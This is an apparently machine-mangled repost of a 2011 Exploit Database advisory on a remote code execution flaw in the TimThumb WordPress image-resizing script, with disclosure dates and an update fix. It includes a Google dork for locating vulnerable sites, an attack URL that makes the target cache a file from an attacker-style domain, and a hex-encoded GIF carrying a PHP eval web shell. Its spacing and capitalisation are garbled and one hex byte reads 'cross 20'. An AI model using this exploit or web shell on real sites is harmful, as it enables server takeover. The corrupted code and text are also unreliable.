WordPress plugin TimThumb Remote Code Execution defect and repair

 

# Exploit Title: WordPress TimThumb Plugin-Remote Code Execution

# Google Dork: inurl: timthumb ext: php-site: googlecode.com-site: google.com

# Date: 3rd August 2011

# Author: MaXe

# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php

# Version: 1.32

 

 

WordPress TimThumb (Theme) Plugin-Remote Code Execution

 

 

Versions Affected:

1. *-1.32 (Only version 1.19 and 1.32 were tested .)

(Version 1.33 did not save the cache file as. php)

 

 

Info: (See references for original advisory)

TimThumb is an image resizing utility, widely used in customized WordPress themes.

 

 

External Links:

Http://www.binarymoon.co.uk/projects/timthumb/

Http://code.google.com/p/timthumb/

 

Credits:

-Mark Maunder (Original Researcher)

-MaXe (Indepedendent Proof of Concept Writer)

 

 

-: The Advisory ::-

TimThumb is prone to a Remote Code Execution vulnerability, due to

Script does not check remotely cached files properly. By crafting

Special image file with a valid MIME-type, and appending a PHP file

The end of this, it is possible to fool TimThumb into believing that it

Is a legitimate image, thus caching it locally in the cache directory.

 

 

Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request .)

Http://www.bkjia.com/wp-content/themes/THEME/timthumb. php? Src = http://blogger.com.evildomain.tld/pocfile.php

 

Stored file on the Target: (This can change from host to host .)

1.19: http://www.bkjia.com/wp-content/themes/THEME/cache/md5 ($ src );

1.32: http://www.bkjia.com/wp-content/themes/THEME/cache/external_md5 ($ src );

Md5 ($ src); means the input value of the 'src' GET-request-Hashed in MD5 format.

 

 

Proof of Concept File:

\ X47 \ x49 \ x46 \ x38 \ x39 \ x61 \ x01 \ x00 \ x01 \ x00 \ x80 \ x00 \ x00

\ XFF \ x00 \ x00 \ x00 \ x21 \ xF9 \ x04 \ x01 \ x00 \ x00 \ x00 \ x00

\ X00 \ x2C \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x01 \ x00 \ x00 \ x02 \ x02

\ X44 \ x01 \ x00 \ x3B \ x00 \ x3C \ x3F \ x68 \ cross 20 \ x40 \ x65

\ X76 \ x61 \ x6C \ x28 \ x24 \ x5F \ x47 \ x45 \ x54 \ x5B \ x27 \ x63 \ x6D

\ X64 \ x27 \ x5D \ x29 \ x3B \ x20 \ x3F \ x3E \ x00

 

(Transparent GIF + <? Php @ eval ($ _ GET ['cmd'])?>

 

 

 

-: Solution ::-

Update to the latest version 1.34 or delete the timthumb file.

 

NOTE: This file is often renamed and you shoshould therefore issue

A command like this in a terminal: (Thanks to rAWjAW for this info .)

Find. | grep php | xargs grep-s timthumb

 

 

Disclosure Information:

-Vulnerability Disclosed (Mark Maunder): 1st August 2011

-Vulnerability Researched (MaXe): 2nd August 2011

-Disclosed at The Exploit Database: 3rd August 2011